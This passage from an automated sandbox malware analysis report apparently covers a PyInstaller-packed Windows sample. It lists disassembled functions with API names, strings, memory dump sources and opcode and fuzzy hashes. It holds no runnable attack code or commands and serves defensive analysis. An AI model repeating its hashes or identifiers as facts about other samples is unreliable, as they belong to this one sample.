                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                            • Instruction ID: 6c8e9b8e34ade2738ac1937f85f24f6fe03155174ada88ef8228cf75e1ad7389
                                                            • Opcode Fuzzy Hash: b8e14b5e39437f3a23779871e591f8317b8e1be46d6eca35f9beed21127490c6
                                                            • Instruction Fuzzy Hash: BC31A361E1860A85E7507B1DA449378A750EBA6B9CFA10176EB1D073DACEFDE4418B30
                                                            Function 00007FF7B110A4D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                            • Instruction ID: 8716bd75c4873c5a78e106ef1e142109b700220e038555b421ecac7b2401a634
                                                            • Opcode Fuzzy Hash: 1e818ce3d7a60ac953b6edb356e5c611bf03bd3223dab8e8a1ec707a6cadd3f1
                                                            • Instruction Fuzzy Hash: 9521A132F0574989EB24AF68E4482EC73A0FB1931CFA40635D71C06AC9DFB9D584C760
                                                            Function 00007FF7B1106A88 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                            • Instruction ID: 4f8362f1aa4bbe5e4c04838c13c6ccfaa69f3af9086557e24e48d888d527a5ba
                                                            • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                            • Instruction Fuzzy Hash: 4A118321E1868981EB60BF59A405279E360EFA6B88FA44031EB4C47A8ADFBCD5408720
                                                            Function 00007FF7B111728C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                            • Instruction ID: 607a69ad079a2fd35f929c31d854b51cff3732e6200fdb68f916a560ac1dfe4d
                                                            • Opcode Fuzzy Hash: 5a2fd61d2380c2417d5794f115bbf4a656e75441d4a409d8b240f29f696bd49a
                                                            • Instruction Fuzzy Hash: A721B032A18A4686DB60AF18E440369F3A0EBA5B58FA54234EB5D467DDDBBCD4118B20
                                                            Function 00007FF7B1100ADC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                            • Instruction ID: 95353a2434b0e06fe433aa03fec3bf79416eab5c7a57ab3ab32d69abfee7bead
                                                            • Opcode Fuzzy Hash: f9b91d952c5f5bbb27c286856a89106101f2e0992174c8f8af0f54b7d3c9b46c
                                                            • Instruction Fuzzy Hash: F401A325E08B4940EB10AF5A6404069E795EB67FE8BA88230DF5C037CACEBCD5118310
                                                            Function 00007FF7B110F738 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7B110BF86,?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2), ref: 00007FF7B110F78D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                            • Instruction ID: 97a9758e94078b147e51e99be244193034fac661b8b28b64839d47ba411acfbf
                                                            • Opcode Fuzzy Hash: fe294415788ef69df4791d37b3f3bc23e16fbf5a99c7a053f345730c87ab0e5c
                                                            • Instruction Fuzzy Hash: 96F04F54F0AB0F42FF547769795A6B5D3809FAAB48FA84430CB0D862C9DEDCA5814231
                                                            Function 00007FF7B110E19C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF7B1101304,?,?,?,00007FF7B1102816,?,?,?,?,?,00007FF7B1103E09), ref: 00007FF7B110E1DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                            • Instruction ID: de4c43c9ef071e0ee0f5a09b5ae6c7771e5886f68f6cacac7d08611ae698837b
                                                            • Opcode Fuzzy Hash: f8a53f2717aa9a418a153665f15f668aef4399ea448e79edee1d71d72a1e7fd0
                                                            • Instruction Fuzzy Hash: FFF05424F0A34F44FF54B66A79052B5D3408F76768F980230EF2E453C9DEACA5408130
                                                            Function 00007FF7B10F83E0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: b0cd14334df36586a3d1a66714b126b768492b2c30ff2554616ad4f51034cb89
                                                            • Instruction ID: f23eec77f51004b16e5629c50d636335733772b5f9a7431da1301952f582789a
                                                            • Opcode Fuzzy Hash: b0cd14334df36586a3d1a66714b126b768492b2c30ff2554616ad4f51034cb89
                                                            • Instruction Fuzzy Hash: 3941D816D1C68581EB11AB28D5462FCB360FBB6748FD49232DB8D4219BEF68F2D8C310

                                                            Non-executed Functions

                                                            Function 00007FF7B10F51E0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                            • API String ID: 190572456-4266016200
                                                            • Opcode ID: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                            • Instruction ID: 4b5f1042b43432669bdee26e8ff32039a3fbe3ef682a7e4fe0f347a117865540
                                                            • Opcode Fuzzy Hash: 0f541286951d05cfde1ee621bc5578c8d1597a0a29c56f9860b2b78389049273
                                                            • Instruction Fuzzy Hash: 3512E96890EB0B90EF55AB0DB895174E3A1AF2775CFC51131CA1E4629CFFFCA168C264
                                                            Function 00007FF7B1114CFC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 808467561-2761157908
                                                            • Opcode ID: ee6ddb9c22397a02ef7f89c4ae9451cd5ee51806b236cf38c383584f5dc4b0f7
                                                            • Instruction ID: f4802f65980e6c614c626644069e3e073edf090e3f3d0de2f874c21bb4626f79
                                                            • Opcode Fuzzy Hash: ee6ddb9c22397a02ef7f89c4ae9451cd5ee51806b236cf38c383584f5dc4b0f7
                                                            • Instruction Fuzzy Hash: 85B21A72E182868BE7A49E28E4407FCF7A1FB6734CF815135DB0957A8CDBB8A510CB50
                                                            Function 00007FF7B10F8560 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00007FF7B10F2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F8587
                                                            • FormatMessageW.KERNEL32 ref: 00007FF7B10F85B6
                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF7B10F860C
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                            • API String ID: 2920928814-3505189403
                                                            • Opcode ID: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                            • Instruction ID: cec61defdc970f45ae875accb683576ebbb191fb7e2cc505c625211cb7d08493
                                                            • Opcode Fuzzy Hash: 341253ed490ea0d4c0f2cc2c63e3841e2b0994626e2ed60ed720fa43fab6ebbb
                                                            • Instruction Fuzzy Hash: 6921516160CA4682FB20EB59F8852A9E361BB6A78CFC40135D74D826ACEFBCD1158720
                                                            Function 00007FF7B10FC6AC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                            • Instruction ID: 43bde53a621ff0dd4b021b8292785c0cee4c040f568251dc01d4c9a533fb1315
                                                            • Opcode Fuzzy Hash: f0495aeca64e737fa0ff218dd5454e1fd46196f668a698fc407bc1dcdf963f54
                                                            • Instruction Fuzzy Hash: DC319272608B8586EB60AF65E8807EDB360FB95748F44403ADB4E47B98DF7CD158C720
                                                            Function 00007FF7B110B1B8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                            • Instruction ID: 2ed63f9481a2b1971fad650c04083f3517250996f5dfbe633a6407e10b415811
                                                            • Opcode Fuzzy Hash: fd667905384e7d9d9673078d4bc89f495a5f33449598c9bf886212c96aaa5de2
                                                            • Instruction Fuzzy Hash: 02318F36608B8586DB209F29E8402AEB3A4FB99758F904136EB8D43B98DF7CD155CB10
                                                            Function 00007FF7B11124C4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2227656907-0
                                                            • Opcode ID: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                            • Instruction ID: 926a12511ecdbf04c9a8ce49bbade97c08ec637269fc19364d7d51d33298d6c6
                                                            • Opcode Fuzzy Hash: 18153d3bacff35197e7a12e87e099423dfee31ad9b8f95cd6c78971f36698885
                                                            • Instruction Fuzzy Hash: B7B12A22B1868A41EB60EB29B4041B9E351EB66BD8FA54131EF5E47BCDDFBCE451C310
                                                            Function 00007FF7B10FC590 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                            • Instruction ID: ff069b71aefb6d7a95bb288b12d50c312e0eaead17e00bf0c6334a6cf18ace56
                                                            • Opcode Fuzzy Hash: c9256d3c29dec7defdbd069e132950cc3752c5933af8d37e6b370c711f310d19
                                                            • Instruction Fuzzy Hash: E5115126B14F068AEB00DF65E8452B873A4F76A758F440E31DB6D42768DFBCD1648350
                                                            Function 00007FF7B1114860 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: memcpy_s
                                                            • String ID:
                                                            • API String ID: 1502251526-0
                                                            • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                            • Instruction ID: 774500523e0fc6ef9eb86275ab574905b1c049c5d65c277359fe1180dbce7997
                                                            • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                            • Instruction Fuzzy Hash: 3DC11572B1868A87D734DF19B04476AF791F7A5B88F868134DB4A63B48DB7DE810CB00
